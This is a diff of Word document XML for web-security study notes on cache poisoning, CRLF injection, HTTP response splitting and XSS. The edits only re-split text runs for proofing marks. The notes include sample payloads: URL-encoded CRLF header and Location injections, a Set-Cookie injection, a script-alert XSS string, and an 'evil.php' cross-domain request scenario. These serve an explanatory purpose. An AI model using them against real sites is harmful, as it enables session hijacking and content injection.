+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>js</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, *.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>css</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, *.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>png</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> files, blog posts, landing pages or any page that is always identical.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9206,7 +10157,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Understand and restrict where caching is done. Are you using frameworks that implement their own caching? If so you may want to disable that and handle caching at a singular point (e.g. CloudFlare).</w:t>
+        <w:t xml:space="preserve">Understand and restrict where caching is done. Are you using frameworks that implement their own caching? If </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>so</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you may want to disable that and handle caching at a singular point (e.g. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>CloudFlare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9356,7 +10343,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Avoid using user inputs (i.e. HTTP Headers) to be used as the cache key.</w:t>
+        <w:t>Avoid using user inputs (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>i.e.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTTP Headers) to be used as the cache key.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9507,7 +10512,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content, i.e. the response body. The HTTP headers and the HTML response (the website content) are separated by a specific combination of special characters, namely a carriage return and a line feed. For short they are also known as CRLF.</w:t>
+        <w:t xml:space="preserve">When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>i.e.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the response body. The HTTP headers and the HTML response (the website content) are separated by a specific combination of special characters, namely a carriage return and a line feed. For short they are also known as CRLF.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9719,7 +10742,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>User-Agent: Mozilla/5.0 (Windows ;U ; Windows NT 5.1; en-US; ) Firefox/3.0.1 Paros/3.2.13\r\n</w:t>
+        <w:t>User-Agent: Mozilla/5.0 (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Windows ;U</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ; Windows NT 5.1; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>en</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-US; ) Firefox/3.0.1 Paros/3.2.13\r\n</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9744,7 +10803,45 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Accept: text/html,application/xhtml+xml,application/xml; q=0.9,*/*;q=0.8\r\n</w:t>
+        <w:t>Accept: text/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>html,application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xhtml+xml,application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/xml; q=0.9,*/*;q=0.8\r\n</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9769,7 +10866,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Accept-Language: en-us,en;q=0.5\r\n</w:t>
+        <w:t xml:space="preserve">Accept-Language: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>en-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>us,en</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>;q</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=0.5\r\n</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9794,7 +10927,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n</w:t>
+        <w:t>Accept-Charset: ISO-8859-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1,utf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-8;q=0.7,*;q=0.7\r\n</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9840,15 +10991,27 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>\r\n  -&gt; carriage return that separates the response headers and the response body</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>\r\n  -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt; carriage return that separates the response headers and the response body</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10073,7 +11236,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Those two consecutive carriage-return-linefeed pairs are the source of HTTP response splitting vulnerabilities , The HTTP response splitting vulnerability is not the attack, it is simply the path that makes it possible</w:t>
+        <w:t xml:space="preserve">Those two consecutive carriage-return-linefeed pairs are the source of HTTP response splitting </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>vulnerabilities ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The HTTP response splitting vulnerability is not the attack, it is simply the path that makes it possible</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10126,7 +11307,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>In a CRLF injection vulnerability attack the attacker inserts both the carriage return and linefeed characters into user input to trick the server, the web application or the user into thinking that an object is terminated and another one has started This is most commonly done by modifying an HTTP parameter or URL. . As such the CRLF sequences are not malicious characters, however they can be used for malicious intent, for HTTP response splitting etc.</w:t>
+        <w:t>In a CRLF injection vulnerability attack the attacker inserts both the carriage return and linefeed characters into user input to trick the server, the web application or the user into thinking that an object is terminated and another one has started This is most commonly done by modifying an HTTP parameter or URL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> As such the CRLF sequences are not malicious characters, however they can be used for malicious intent, for HTTP response splitting etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10173,7 +11372,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> servers are vulnerable to CRLF injection but Only old </w:t>
+        <w:t xml:space="preserve"> servers are vulnerable to CRLF injection but </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Only</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> old </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10293,6 +11514,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -10311,7 +11533,18 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t xml:space="preserve"> :-</w:t>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10590,7 +11823,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Since the header of a HTTP response and its body are separated by CRLF characters an attacker can try to inject those. A combination of CRLF CRLF will tell the browser that the header ends and the body </w:t>
+        <w:t xml:space="preserve">Since the header of a HTTP response and its body are separated by CRLF characters an attacker can try to inject those. A combination of CRLF </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>CRLF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will tell the browser that the header ends and the body </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10765,7 +12016,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Set-Cookie:mycookie=myvalue </w:t>
+        <w:t>Set-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Cookie:mycookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=myvalue </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10917,13 +12190,23 @@
           <w:t>www.example.net</w:t>
         </w:r>
       </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/[INJECTION STARTS HERE]</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>INJECTION STARTS HERE]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10950,8 +12233,42 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Set-Cookie: mycookie=myvalue</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Set-Cookie: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mycookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>myvalue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10996,7 +12313,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>X-Sucuri-ID: 15016</w:t>
+        <w:t>X-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Sucuri</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-ID: 15016</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11019,8 +12354,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>x-content-type-options: nosniff</w:t>
-      </w:r>
+        <w:t xml:space="preserve">x-content-type-options: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nosniff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11042,7 +12387,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>x-xss-protection: 1; mode=block</w:t>
+        <w:t>x-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xss</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-protection: 1; mode=block</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11154,7 +12517,25 @@
             <w:rFonts w:cstheme="minorHAnsi"/>
             <w:color w:val="auto"/>
           </w:rPr>
-          <w:t>google.com/%2F..%0D%0AHeader-Test:test2</w:t>
+          <w:t>google.com/%2</w:t>
+        </w:r>
+        <w:proofErr w:type="gramStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cstheme="minorHAnsi"/>
+            <w:color w:val="auto"/>
+          </w:rPr>
+          <w:t>F..%</w:t>
+        </w:r>
+        <w:proofErr w:type="gramEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cstheme="minorHAnsi"/>
+            <w:color w:val="auto"/>
+          </w:rPr>
+          <w:t>0D%0AHeader-Test:test2</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11173,7 +12554,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /%0d%0aLocation:%20</w:t>
+        <w:t xml:space="preserve"> /%0d%0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>aLocation:%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>20</w:t>
       </w:r>
       <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
@@ -11499,7 +12894,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Add page content with an XSS: &lt;script&gt;alert(1)&lt;/script&gt;. This content has exactly 25 bytes.</w:t>
+        <w:t>Add page content with an XSS: &lt;script&gt;alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/script&gt;. This content has exactly 25 bytes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12054,15 +13467,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">your desired html tags </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>: &lt;</w:t>
+        <w:t xml:space="preserve">your desired html </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tags </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12346,7 +13777,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Injection of XSS attacks, hoping that the malicious log event isviewed in a vulnerable web application</w:t>
+        <w:t xml:space="preserve">Injection of XSS attacks, hoping that the malicious log event </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>isviewed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in a vulnerable web application</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12585,7 +14034,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The malicious page (evil.php) will contain JavaScr</w:t>
+        <w:t>The malicious page (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>evil.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) will contain </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>JavaScr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12599,7 +14072,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">t that performs a cross-domain AJAX request to the URL </w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that performs a cross-domain AJAX request to the URL </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12616,6 +14097,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="24"/>
@@ -12628,7 +14110,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;payload&gt;</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>payload&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12687,7 +14177,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;scr</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12703,7 +14202,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>t&gt;</w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
